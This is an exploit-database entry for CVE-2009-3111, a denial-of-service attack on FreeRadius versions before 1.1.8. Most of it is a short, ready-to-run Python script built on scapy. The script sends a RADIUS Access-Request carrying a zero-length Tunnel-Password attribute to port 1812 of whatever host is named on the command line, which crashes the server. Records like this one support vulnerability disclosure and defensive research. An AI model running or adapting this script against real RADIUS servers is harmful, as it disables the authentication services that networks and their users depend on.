[] NeoSense
E X P L O I T S
title author type platform port cve id

FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service

Author: Matthew Gillespie
type: dos
platform: multiple
port: 1812.0
date_added: 2009-09-10 
date_updated:  
verified: 1 
codes: CVE-2009-3111 
tags: 
aliases:  
screenshot_url:  
application_url: 
#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py <radiushost>\n"
	sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
	Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
	RadiusAttr(type=69,value="",len=2)

send(PoD)

# milw0rm.com [2009-09-11]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.